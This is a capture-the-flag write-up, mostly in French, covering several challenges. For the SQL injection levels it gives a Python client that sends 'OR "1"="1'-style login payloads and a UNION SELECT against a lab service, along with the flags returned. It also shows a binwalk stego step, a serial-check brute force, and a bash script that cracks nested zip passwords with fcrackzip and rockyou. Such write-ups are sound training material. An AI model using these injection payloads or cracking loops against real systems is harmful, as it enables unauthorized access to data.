

ctf_mssis_ctf



Challenges Misc 1 et 2

root@kali:~/Downloads# python client.py
[+] Test level1 ...
Welcome on level 1 !

Welcome b'admin" OR "1"="1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 ...
Welcome on level 2 !

Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}

Code source : client.py

client.py
#encoding: utf-8
 
import socket
import sys
 
# Address of the challenge service; point it at your own lab instance.
HOST = "192.168.1.19"
# TCP port of the service. NOTE: despite its name, IP holds the port number:
# it is the second element of the (host, port) pair given to connect().
IP = 8096
 
 
def create_socket():
    """Return a TCP socket connected to the challenge service.

    The socket targets the module-level (HOST, IP) pair, where IP holds the
    port number. Its one-second timeout is set on the socket object, so it
    also applies to later send/recv calls made by the caller. On any failure
    the error is printed and the process exits with status 1.
    """
    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.settimeout(1)
        conn.connect((HOST, IP))
    except Exception as err:
        print("Can't open socket !")
        print(err)
        sys.exit(1)
    else:
        return conn
 
 
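def test_level1():
    """Replay the level 1 login check against the challenge service.

    Sends one message made of the byte 0x01, the login, a NUL separator and
    the password, then prints the greeting and the reply that follows it.

    Both fields carry an always-true ``OR "1"="1"`` condition. The transcript
    on this page shows the service returning the flag for that login, which
    suggests (the server code is not shown) that the fields are concatenated
    into the SQL text. The server-side fix is a parameterized query, so the
    submitted values are bound as data and never parsed as SQL.
    """
    print("[+] Test level1 ...")
    s = create_socket()
    try:
        login = 'admin" OR "1"="1'
        password = 'toto" OR "1"="1"  LIMIT "1" OFFSET "2'
        cmd = "\x01%s\x00%s" % (login, password)
        # sendall() keeps writing until the whole message is out; send() may
        # return after a partial write.
        s.sendall(cmd.encode('utf-8'))
        msg = s.recv(1024)

        # An empty read means the peer closed the connection.
        greeting = msg.decode('utf-8') if msg else ""
        if greeting.startswith("Welcome"):
            print(greeting)
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    finally:
        # Release the socket even when recv() times out or decoding fails.
        s.close()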
 
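def test_level2():
    """Replay the level 2 citation lookup against the challenge service.

    Sends the byte 0x02 followed by the citation field, then prints the
    greeting and the reply that follows it.

    The field is expected to be a numeric id but carries a trailing
    ``union SELECT``. The transcript on this page shows the service echoing
    the whole value and returning a row from the ``flag`` table, which
    suggests (the server code is not shown) that the id is interpolated into
    the query unvalidated. Server-side, the id should be parsed as an integer
    and passed as a bound parameter.
    """
    print("[+] Test level2 ...")
    s = create_socket()
    try:
        citation = '123 union SELECT * fROM flag'
        # Format as text, then encode, as test_level1 does: the original
        # b"..." % str raises TypeError on Python 3.
        cmd = "\x02%s" % (citation,)
        # sendall() keeps writing until the whole message is out; send() may
        # return after a partial write.
        s.sendall(cmd.encode('utf-8'))
        msg = s.recv(1024)

        # An empty read means the peer closed the connection.
        greeting = msg.decode('utf-8') if msg else ""
        if greeting.startswith("Welcome"):
            print(greeting)
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    finally:
        # Release the socket even when recv() times out or decoding fails.
        s.close()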
 
 
 
if __name__ == '__main__':
    # Run level 1 then level 2, with an empty line between their outputs.
    for position, run_level in enumerate((test_level1, test_level2)):
        if position:
            print("")
        run_level()

challenge de stegano

Il fallait trouver un fichier caché dans une image. Il suffisait de rentrer ça :p et on avait le flag :

binwalk --dd='.*' special-k.png

serial

Il fallait trouver des serials qui respectent le code Python suivant :

import random, string

def are_same(serial):
    """Tell whether at least two of the first three items of *serial* match.

    Despite the name, the result is True as soon as any pair among
    serial[0], serial[1] and serial[2] is equal; it is False only when the
    three items are pairwise distinct.
    """
    # Same comparison order as the negated form, so short-circuiting is kept.
    return (serial[0] == serial[1]
            or serial[1] == serial[2]
            or serial[0] == serial[2])

def check_serial(serial):
    """Validate a serial of the form ``XXX-YYY-Z``.

    A serial is accepted only when all of the following hold:

    * it splits on '-' into exactly three fields;
    * the first two fields are three characters each, all with code points
      in 65..90 (ASCII 'A'..'Z'), and are_same() is False for both;
    * in the first field, the third code is at least the second plus 10;
    * in the second field, the third code is at most the second minus 10;
    * the two fields have different code sums;
    * the third field parses with int() to the total of both sums, and that
      total is a multiple of 3.

    Input that cannot be split or converted returns False.

    NOTE(review): every rule here is public and no secret or signature is
    involved, so this is a format check, not an authenticity check: any
    string that meets the arithmetic is accepted.
    """
    try:
        fields = serial.split('-')
    except:  # deliberately broad: anything that cannot be split is invalid
        return False
    if len(fields) != 3:
        return False

    try:
        left = [ord(ch) for ch in fields[0]]
        right = [ord(ch) for ch in fields[1]]
        total = int(fields[2])
    except:  # deliberately broad: any conversion failure is invalid
        return False

    if len(left) != 3 or len(right) != 3:
        return False

    # 65..90 are the code points of 'A'..'Z': uppercase ASCII only.
    if not all(65 <= code <= 90 for code in left + right):
        return False

    if are_same(left) or are_same(right):
        return False

    if left[2] < left[1] + 10:
        return False
    if right[2] > right[1] - 10:
        return False

    left_sum, right_sum = sum(left), sum(right)
    if left_sum == right_sum:
        return False
    if left_sum + right_sum != total:
        return False
    return total % 3 == 0

Au lieu de chercher des valeurs à la main, j'ai bruteforcé avec ce code :

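# Draw random candidates of the form AAA-BBB-NNN until one passes
# check_serial(). Every candidate is printed, and the accepted one is printed
# a second time just before the loop stops.
# print() is written as a call so the snippet parses on Python 3 as well as
# Python 2, and the unreachable exit() after break has been dropped.
while True:
    x = ''.join(random.choice(string.ascii_uppercase) for _ in range(3))
    y = ''.join(random.choice(string.ascii_uppercase) for _ in range(3))
    # Three random digits, so leading zeros are possible; check_serial()
    # converts this field with int().
    z = ''.join(random.choice(string.digits) for _ in range(3))

    s = "%s-%s-%s" % (x, y, z)
    print(s)
    if check_serial(s):
        print(s)
        break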

exemple de flag DGR-GVH-450

deeper

Une archive zip qui contient un zip, qui contient un zip… chacun protégé par un mot de passe :/

code bash pour automatiser la tâche

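#!/bin/bash
# Unwrap a chain of nested, password-protected zip archives.
#
# Each round identifies the current file with file(1). If it is a zip, the
# password is looked up with fcrackzip against the rockyou wordlist, the
# archive is extracted, and the extracted member becomes the next file.
#
# NOTE(review): member names come from the archive itself, so they are
# untrusted input. Every expansion of $file is quoted so that a name is never
# word-split or glob-expanded; run this in a scratch directory.
# Assumes one member per archive -- TODO confirm for other inputs.

# $1: name of the zip passed as argument
file=$1
count=1

while true; do
	echo "test $count : $file"
	# Stop as soon as the current file is not reported as a zip archive.
	if ! file "$file" | grep 'Zip'; then
		break
	fi
	echo "ZIP ok"
	r=$(fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt "$file")
	# The password follows "== " in fcrackzip's output; keep only lines that
	# contain that separator so blank lines do not end up in $pass.
	pass=$(printf '%s\n' "$r" | awk -F"== " 'NF > 1 {print $2; exit}')
	echo "pass is : $pass"
	# unzip pads the member name with trailing blanks; strip them because the
	# name is now used quoted.
	next=$(unzip -P "$pass" "$file" | grep -E 'extracting|inflating' | awk -F": " '{print $2}' | sed 's/[[:space:]]*$//')
	echo "new file [$next]"
	if [ -z "$next" ]; then
		# Nothing was extracted (wrong or missing password): stop here.
		break
	fi
	file=$next
	count=$((count + 1))
done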

output

root@kali:~/deeper# ./run.sh 8KLifFpoUdbxXB5noGIG.zip.start
test 1 : 8KLifFpoUdbxXB5noGIG.zip.start
8KLifFpoUdbxXB5noGIG.zip.start: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : AC020307
new file [6TF2INzK1as0vC4hmGVW.zip ]
test 2 : 6TF2INzK1as0vC4hmGVW.zip
6TF2INzK1as0vC4hmGVW.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : tiagia4
new file [BYJrsoCOfTlWehfvNoBU.zip ]
test 3 : BYJrsoCOfTlWehfvNoBU.zip
BYJrsoCOfTlWehfvNoBU.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : jesipato
new file [uBKIeGWEztQN7FwsSr6b.zip ]
test 4 : uBKIeGWEztQN7FwsSr6b.zip
uBKIeGWEztQN7FwsSr6b.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : benk2007benk
new file [exhNdH5BI2Hr0lV99EEs.zip ]
test 5 : exhNdH5BI2Hr0lV99EEs.zip
exhNdH5BI2Hr0lV99EEs.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : 02456035
…
